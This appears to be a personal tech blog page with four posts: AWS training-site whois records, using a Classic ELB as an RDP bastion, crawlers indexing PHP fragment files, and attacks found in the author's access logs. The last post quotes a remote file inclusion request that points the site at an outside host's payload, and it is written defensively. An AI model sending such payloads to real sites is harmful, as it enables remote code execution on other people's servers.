Showing posts with label website management.

Tuesday, June 8, 2021

An open letter to the AWS Training organization

You don't have a Feedback link on your site, but it seems that Amazon keeps close tabs on the Blogosphere, so hopefully this reaches you.

I don't know whether you're an actual sub-division of Amazon, but the website URL https://www.aws.training certainly didn't give me a warm fuzzy feeling when it came up in Google. In fact, my first thought was that it was some unaffiliated company that had better SEO.

So, since it was asking me for login credentials, I did what any reasonably cautious technologist would do, and ran whois. And this is what I got back:

Domain Name: aws.training
Registry Domain ID: 8d519b3def254d2f980a08f62416a5b9-DONUTS
Registrar WHOIS Server: whois.comlaude.com
Registrar URL: http://www.comlaude.com
Updated Date: 2019-05-19T19:54:24Z
Creation Date: 2014-03-19T00:32:11Z
Registry Expiry Date: 2024-03-19T00:32:11Z
Registrar: Nom-iq Ltd. dba COM LAUDE
Registrar IANA ID: 470
Registrar Abuse Contact Email: abuse@comlaude.com
Registrar Abuse Contact Phone: +44.2074218250
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Amazon Technologies, Inc.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: NV
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

That's the sort of whois entry that you get for an individual using a shared hosting service. In fact, it provides less information than you'll see for my own domain, which does run on a shared hosting service and for which I pay extra for privacy.

By comparison, the whois entry for Amazon itself looks like this (and note that it's a different registrar, another red flag):

Domain Name: amazon.com
Registry Domain ID: 281209_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2019-08-26T12:19:56-0700
Creation Date: 1994-10-31T21:00:00-0800
Registrar Registration Expiration Date: 2024-10-30T00:00:00-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895770
Registrant Name: Hostmaster, Amazon Legal Dept.
Registrant Organization: Amazon Technologies, Inc.
Registrant Street: P.O. Box 8102
Registrant City: Reno
Registrant State/Province: NV
Registrant Postal Code: 89507
Registrant Country: US
Registrant Phone: +1.2062664064
Registrant Phone Ext: 
Registrant Fax: +1.2062667010
Registrant Fax Ext: 
Registrant Email: hostmaster@amazon.com

While I'm a little surprised by the Reno address, rather than Seattle, this at least looks like the sort of registration information used by a business rather than somebody who pays $10/month for hosting.

I ended up getting to the training site via a link in the AWS Console, so I was able to achieve my goal.

But I think there's a general lesson: don't forsake your brand without good reason.

And at the very least, ask your network administrators to update your whois data.

Wednesday, December 21, 2016

Hacking the VPC: ELB as Bastion

A common deployment structure for Amazon Virtual Private Clouds (VPCs) is to separate your servers into public and private subnets. For example, you put your webservers into the public subnet, and database servers in the private subnet. Or for more security you put all of your servers in the private subnet, with an Elastic Load Balancer (ELB) in the public subnet as the only point-of-contact with the open Internet.

The problem with this second architecture is that you have no way to get to those servers for troubleshooting: the definition of a private subnet is that it does not expose servers to the Internet.*

The standard solution involves a “bastion” host: a separate EC2 instance that runs on the public subnet and exposes a limited number of ports to the outside world. For a Linux-centric deployment, it might expose port 22 (SSH), usually restricted to a limited number of source IP addresses. In order to access a host on the private network, you first connect to the bastion host and then from there connect to the private host (although there's a neat trick with netcat that lets you connect via the bastion without an explicit login).
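
That netcat trick is worth a quick sketch. With something like this in ~/.ssh/config (the host names and addresses are invented for illustration), a plain "ssh app-server" tunnels through the bastion without an explicit login on it:

Host bastion
    HostName bastion.example.com
    User ec2-user

Host app-server
    HostName 10.0.1.15
    User ec2-user
    # from the bastion, open a raw TCP connection to the private host and tunnel ssh through it
    ProxyCommand ssh bastion nc %h %p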

The problem with a bastion host — or, for Windows users, an RD Gateway — is that it costs money. Not much, to be sure: ssh forwarding doesn't require much in the way of resources, so a t2.nano instance is sufficient. But still …

It turns out that you've already got a bastion host in your public subnet: the ELB. You might think of your ELB as just a front-end for your webservers: it accepts requests and forwards them to one of a fleet of servers. If you get fancy, maybe you enable session stickiness, or do HTTPS termination at the load balancer. But what you may not realize is that an ELB can forward any TCP port.**

So, let's say that you're running some Windows servers in the private subnet. To expose them to the Internet, go into your ELB config and add a listener that forwards traffic on port 3389.
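
If you prefer the command line to console screenshots, the Classic Load Balancer API can do the same thing; this is just a sketch, and the load balancer name is made up:

aws elb create-load-balancer-listeners \
    --load-balancer-name my-private-elb \
    --listeners "Protocol=TCP,LoadBalancerPort=3389,InstanceProtocol=TCP,InstancePort=3389"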

Of course, you don't really want to expose those servers to the Internet; you want to expose them to your office network. That's controlled by the security group attached to the ELB: add an inbound rule that allows access only from your home/office network (yeah, I'm not showing my real IP here).
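
The CLI equivalent looks something like this; the group ID is a placeholder, and 203.0.113.0/24 is a documentation range, not my network:

aws ec2 authorize-security-group-ingress \
    --group-id sg-0aaaaaaaaaaaaaaaa \
    --protocol tcp \
    --port 3389 \
    --cidr 203.0.113.0/24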

Lastly, if you use an explicit security group to control traffic from the ELB to the servers, you'll also need to open the port on it. Personally, I like the idea of a “default” security group that allows all components of an application within the VPC to talk with each other.
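
If your servers do sit behind their own security group, you can reference the ELB's group as the traffic source rather than an IP range; again, both group IDs here are placeholders:

# sg-0bbb... is the servers' group, sg-0aaa... is the ELB's group
aws ec2 authorize-security-group-ingress \
    --group-id sg-0bbbbbbbbbbbbbbbb \
    --protocol tcp \
    --port 3389 \
    --source-group sg-0aaaaaaaaaaaaaaaa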

You should now be able to fire up your favorite RDP client and connect to a server.

> xfreerdp --plugin cliprdr -u Administrator 52.15.40.131
loading plugin cliprdr
connected to 52.15.40.131:3389
Password: 
...

The big drawback, of course, is that you have no control over which server you connect to. But for many troubleshooting tasks, that doesn't matter: any server in the load balancer's list will show the same behavior. And in development, where you often have only one server, this technique lets you avoid creating special configuration that won't run in production.


* Actually, the definition of a public subnet is that it routes non-VPC traffic to an Internet Gateway, which is a precondition for exposing servers to the Internet. However, this isn't a sufficient condition: even if you have an Internet Gateway you can prevent access to a host by not giving it a public IP. But such pedantic distinctions are not really relevant to the point of this post; for practical purposes, a private subnet doesn't allow any access from the Internet to its hosts, while a public subnet might.

** I should clarify: a Classic Load Balancer can forward any TCP port; an Application Load Balancer handles only HTTP and HTTPS, but has highly configurable routing. See the docs for more details.

Wednesday, February 26, 2014

Nosy Web Spiders

The other day I was Googling for some technical detail that I'd written about (you think I remember where I put stuff?), and saw some surprising results: in addition to the public web page that I wanted, I also saw the PHP “fragment” that I use to build the public page. This was surprising because there aren't any links to that page on my site; the only reference to it is in a table that associates the page name to a filename.

Looking at the structure of my site, I realized what had happened. In my original site design, I had put all of the page-related content in the same directory as the fragment file. A few years ago I re-organized the files, but left one presentation in place; it was linked by a couple of sites, and I had no way at that time to do a 301 redirect. While that decision seemed harmless, it left me open to the following:

66.249.73.164 - - [30/Aug/2013:15:21:34 -0700] "GET /programming/ HTTP/1.1" 200 1542 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [30/Aug/2013:15:23:03 -0700] "GET /programming/intro.frag HTTP/1.1" 200 2355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [30/Aug/2013:15:23:57 -0700] "GET /programming/scm.git.frag HTTP/1.1" 200 34073 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

To explain: they took the URL for the presentation, stripped off the filename component, and retrieved a directory listing. Then they crawled each of the files returned from that listing, and added them to their index. This is, quite frankly, a script-kiddie hack. In fact, the first time I saw this behavior it was a script-kiddie exploring my site.

I don't really care about script-kiddies: the directories that I want to keep private have directory listings disabled, and also have a dummy index.html that redirects back to my home page. If someone wants to learn my madd skillz with PHP, fine, have at it (but don't feel compelled to comment if you don't find my skillz that madd).
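
For anyone who hasn't already turned listings off, a one-line .htaccess in the affected directory is usually enough on Apache (assuming your host's AllowOverride settings permit it):

# disable automatic directory listings for this directory and below
Options -Indexes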

But why does Google (and Bing, and Baidu, and many others) feel the need to do this?

I try to follow their rules: I have a sitemap that lists the “interesting” pages on my site; I use noindex and nofollow meta tags (and canonical, which is a whole ‘nother rant); I have a robots.txt that lists directories that aren't covered by the meta tags. In short, I have presented them with my website as I want it to appear in their index.

But they choose to ignore that, poke around my website, and pick up whatever droppings they can find. Which ultimately makes their index, and the Internet as a whole, a worse place.

I suppose it's time to update robots.txt.
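
Something along these lines would at least tell well-behaved crawlers to leave the fragment files alone; note that the wildcard and $ syntax is a Google/Bing extension rather than part of the original robots.txt spec, and the path pattern here is only illustrative:

User-agent: *
# keep crawlers away from the raw PHP fragment files
Disallow: /*.frag$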

Saturday, October 3, 2009

Script Kiddies

As you might have guessed from my earlier posting about del.icio.us, I pay attention to the access logs for my main website. It's interesting to see what pages are getting traffic, and where that traffic is coming from. This month, of course, the article on Java Reference Objects was far and away the winner, with almost exactly 50% of the hits. However, nearly 25% of these hits came from Google searches — which is not surprising, since it's on the first page when you Google “java reference objects”. Unfortunately for the world of software, a lot of the query strings indicate deep misunderstandings of how Java works. And then there are the strange ones: I have yet to figure out what “sensitive objects” could be.

What's really interesting about my access logs, however — and why I look at them rather than using a web beacon — are the attacks on my site. I have a homegrown page management system, which I think is fairly solid, but ever since I saw the first attack I've paid attention to them. Here's a typical log entry, which appears to come from a home computer:

68.217.2.156 - - [05/Sep/2009:16:38:07 -0700] "GET /index.php?page=http://64.15.67.17/~calebsbi/logo.jpg? HTTP/1.1"

If my pages blindly took the page parameter value and passed it to include, this attack would work. And if you Google for “calebsbi” you'll see over 30,000 hits, indicating that there are a lot of people who blindly pass parameters to include. Other attacks try to read the password file, and one enterprising person wrote a script that sent himself email (to a Google address, which I promptly reported).
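
For contrast, a minimal sketch of a lookup-table approach (the page names and file paths here are invented) uses the request parameter only as a key into a whitelist, never as part of a file path:

<?php
// map of allowed page names to the fragment files that build them
$pages = array(
    'home'        => 'fragments/home.frag',
    'programming' => 'fragments/programming.frag',
);

// anything that isn't in the map falls back to the home page
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if (!array_key_exists($page, $pages)) {
    $page = 'home';
}

include $pages[$page];
?>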

What's amazing to me is the amount of effort these people expend. Oh, sure, I expect that the actual hits come from a bot, but someone has gone to the trouble to figure out that my site is driven by the page parameter: I don't get hits with include= or sql=. And it's not always a botnet doing the hits: one night a person came to my site from Twitter, and spent over an hour trying different URL combinations. He (I'll assume) actually managed to uncover portions of my site's directory tree (the programming examples use a simple directory tree, which has since been “capped” with a redirect), and started trying URLs that included functions from my page fragments.

So far, my site hasn't been hacked, and I think a large part of the reason is that the attackers have been “script kiddies,” trying attacks that they don't really understand. The person who walked my programming directories, for example, kept putting needless parameters on the URLs. And if you try to retrieve “logo.jpg”, you'll find that there's no longer any webserver at that address. Yet the attacks keep coming, so I keep looking to see that my site code behaves as expected.